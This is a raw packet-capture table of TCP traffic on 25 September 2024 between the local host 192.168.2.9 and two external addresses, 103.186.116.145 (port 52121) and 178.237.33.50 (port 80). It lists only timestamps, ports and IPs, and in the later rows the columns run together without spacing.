                      Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                      Sep 25, 2024 19:45:41.405975103 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:45:41.412693024 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:45:41.412796021 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:45:41.473687887 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:45:41.481400013 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:45:42.374722004 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:45:42.434528112 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:45:42.653403044 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:45:42.677469969 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:45:42.682313919 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:45:42.682435036 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:45:42.687405109 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:45:42.689479113 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:45:42.694349051 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:45:43.497641087 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:45:43.498657942 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:45:43.503751040 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:45:43.780155897 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:45:43.825169086 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:45:45.831402063 CEST  49712        80         192.168.2.9      178.237.33.50
                      Sep 25, 2024 19:45:45.836251974 CEST  80           49712      178.237.33.50    192.168.2.9
                      Sep 25, 2024 19:45:45.836378098 CEST  49712        80         192.168.2.9      178.237.33.50
                      Sep 25, 2024 19:45:45.837045908 CEST  49712        80         192.168.2.9      178.237.33.50
                      Sep 25, 2024 19:45:45.841931105 CEST  80           49712      178.237.33.50    192.168.2.9
                      Sep 25, 2024 19:45:46.455668926 CEST  80           49712      178.237.33.50    192.168.2.9
                      Sep 25, 2024 19:45:46.455734968 CEST  49712        80         192.168.2.9      178.237.33.50
                      Sep 25, 2024 19:45:46.467329979 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:45:46.472340107 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:45:47.455972910 CEST  80           49712      178.237.33.50    192.168.2.9
                      Sep 25, 2024 19:45:47.456131935 CEST  49712        80         192.168.2.9      178.237.33.50
                      Sep 25, 2024 19:46:13.859019995 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:46:13.860444069 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:46:13.865423918 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:46:44.221168995 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:46:44.223073006 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:46:44.229969025 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:47:14.608474016 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:47:14.630223989 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:47:14.637101889 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:47:35.700773001 CEST  49712        80         192.168.2.9      178.237.33.50
                      Sep 25, 2024 19:47:36.012814045 CEST  49712        80         192.168.2.9      178.237.33.50
                      Sep 25, 2024 19:47:36.622191906 CEST  49712        80         192.168.2.9      178.237.33.50
                      Sep 25, 2024 19:47:37.825278997 CEST  49712        80         192.168.2.9      178.237.33.50
                      Sep 25, 2024 19:47:40.231591940 CEST  49712        80         192.168.2.9      178.237.33.50
                      Sep 25, 2024 19:47:45.007077932 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:47:45.009480000 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:47:45.015899897 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:47:45.044081926 CEST  49712        80         192.168.2.9      178.237.33.50
                      Sep 25, 2024 19:47:54.653516054 CEST  49712        80         192.168.2.9      178.237.33.50
                      Sep 25, 2024 19:48:15.459876060 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:48:15.461697102 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:48:15.470330954 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:48:46.016565084 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:48:46.018357038 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:48:46.025369883 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:01.111227036 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:01.112564087 CEST  49719        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:01.118170977 CEST  52121        49719      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:01.119541883 CEST  49719        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:01.123353958 CEST  49719        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:01.128459930 CEST  52121        49719      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:01.153548002 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:01.438397884 CEST  52121        49709      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:01.443514109 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:01.457863092 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:01.459574938 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:01.462908030 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:01.470372915 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:01.481676102 CEST  49709        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.122570992 CEST  52121        49719      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.169178009 CEST  49719        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.393400908 CEST  52121        49719      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.400548935 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.450423002 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.450438023 CEST  49719        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.488893986 CEST  49719        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.510525942 CEST  52121        49719      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.511548996 CEST  49719        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.521616936 CEST  52121        49719      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.670119047 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.716098070 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.742522955 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.756731987 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.759661913 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.764596939 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.764659882 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.771913052 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.783799887 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.798588991 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.882821083 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.888499022 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.888534069 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.888582945 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.888598919 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.888644934 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.888650894 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.888679981 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.888694048 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.888729095 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.888809919 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.888839006 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.888859987 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:02.888890982 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.888919115 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.888946056 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.899168968 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.899456024 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.900129080 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.900388002 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.900417089 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:02.900445938 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:03.497625113 CEST  49719        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:03.502933025 CEST  52121        49719      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:03.822885990 CEST  52121        49720      103.186.116.145  192.168.2.9
                      Sep 25, 2024 19:49:03.854736090 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:03.855959892 CEST  49720        52121      192.168.2.9      103.186.116.145
                      Sep 25, 2024 19:49:03.862467051 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.862502098 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.862530947 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.863661051 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.863712072 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.863740921 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.863842964 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.866640091 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.866668940 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.866697073 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.866724014 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.866751909 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.866784096 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.866811037 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.866837978 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.867126942 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:03.869012117 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.513235092 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:04.526392937 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.925208092 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.962523937 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:04.963804007 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:04.971230984 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.971252918 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.971689939 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.971725941 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.971744061 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.971775055 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.971793890 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.971812010 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.971829891 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.971847057 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.971864939 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.972311974 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.972331047 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.972349882 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.972454071 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.972480059 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.972498894 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.972517967 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.972536087 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.972553968 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.972573042 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.977032900 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.528837919 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:05.543582916 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.883548975 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.914943933 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:05.916260004 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:05.922329903 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922341108 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922349930 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922415018 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922425985 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922435045 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922527075 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922535896 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922544003 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922720909 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922730923 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922739983 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922754049 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922763109 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923456907 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923465967 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923475027 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923717976 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923728943 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923738956 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923749924 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.924041986 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.544791937 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:06.550420046 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.872687101 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.920965910 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:06.922293901 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:06.926103115 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926259041 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926418066 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926426888 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926485062 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926672935 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926683903 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926772118 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926780939 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926789999 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926800966 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926810026 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926820040 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926829100 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.932344913 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.932574034 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.932704926 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.932996988 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.933006048 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.933015108 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.933027029 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.933037043 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.561249971 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:07.578579903 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.900851011 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.950454950 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:07.951919079 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:07.955373049 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955559015 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955568075 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955575943 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955904007 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955913067 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955920935 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955930948 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955940962 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955955982 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955965042 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956001997 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956010103 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956018925 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956775904 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956823111 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956831932 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956872940 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956881046 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.957091093 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.957098961 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.957254887 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.578924894 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:08.584001064 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.902595997 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.950562954 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:08.950802088 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:08.952178001 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:08.955774069 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956003904 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956012964 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956022978 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956129074 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956137896 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956146955 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956233025 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956720114 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960530043 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960539103 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960578918 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960594893 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960659981 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960690022 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960694075 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960762978 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960772991 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960876942 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960886002 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960896969 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960907936 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960916996 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.591706991 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:09.596657038 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.924777031 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.962579012 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:09.963793039 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:09.967700005 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967720985 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967784882 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967794895 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967803955 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967814922 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967864990 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967907906 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.968007088 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.968017101 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972593069 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972608089 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972750902 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972763062 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972784042 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972814083 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972822905 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972862005 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972871065 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.973053932 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.973063946 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.973144054 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.607218981 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:10.612205982 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.931153059 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.963779926 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:10.965061903 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:10.971797943 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.971829891 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.971838951 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.971848011 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.971862078 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.971869946 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.974531889 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.974544048 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.974553108 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.977873087 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.977883101 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.977966070 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.977977037 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.977984905 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.978117943 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.978127956 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.978136063 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.978143930 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.978152990 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.978161097 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.980771065 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.980782986 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.622525930 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:11.627571106 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.946424961 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.977950096 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:11.979167938 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:11.984889984 CEST5212149720103.186.116.145192.168.2.9
